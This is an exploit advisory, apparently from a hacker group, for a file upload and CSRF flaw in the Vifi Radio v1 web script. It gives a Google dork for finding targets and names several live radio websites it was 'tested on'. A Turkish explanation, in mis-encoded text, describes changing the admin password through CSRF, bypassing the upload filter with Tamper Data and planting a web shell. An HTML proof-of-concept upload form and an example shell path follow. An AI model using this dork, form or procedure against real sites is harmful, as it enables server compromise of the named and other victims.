                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/   http://h4x0resec.blogspot.com
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/         
Vifi Radio v1 - Arbitrary File Upload Vulnerability with CSRF
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,
Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html 
|~Official Demo :  http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################
Tested on;
http://radyo.vifibilisim.com
www.radyoimza.com
www.bayraklifm.com
www.istanbulfm.net
www.gaziantepfurkanradyo.com
http://iskenderunfm.com
----------------------------------------------------------
BÄ°LGÄ° : 
Scriptte daha Ã¶nce keÅŸfedilmiÅŸ olan CSRF Zaafiyeti Kullanarak Admin Åžifresi deÄŸiÅŸtirilir ve panele giriÅŸ yapÄ±lÄ±r.
AÅŸaÄŸÄ±da verilen PoC kodlar, "Tamper Data" EÅŸliÄŸinde Upload sÃ¼zgecini bypass etmek iÃ§in kullanÄ±ldÄ±ÄŸÄ±nda zararlÄ± yazÄ±lÄ±m doÄŸrudan sunucuya yÃ¼klenebilir.
YÃ¼klenen Shell DosyasÄ±nÄ±n sunucudaki yerini "Tamper Data" zaten iletim esnasÄ±nda yakalayacaktÄ±r.
Alternatif olarak "Anasayfa" Ã¼zerinde aÅŸaÄŸÄ±da yer alan "Djler" bÃ¶lÃ¼mÃ¼nden shell dosyasÄ±nÄ±n izi sÃ¼rÃ¼lebilir.

Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php

----------------------------------------------------------
            Upload.HTML
-----------------------------------------------------------

<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>
</tr> <tr>
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">
<input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" /></td>
			
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>

############################
"Admin Panel: /yonetim "
############################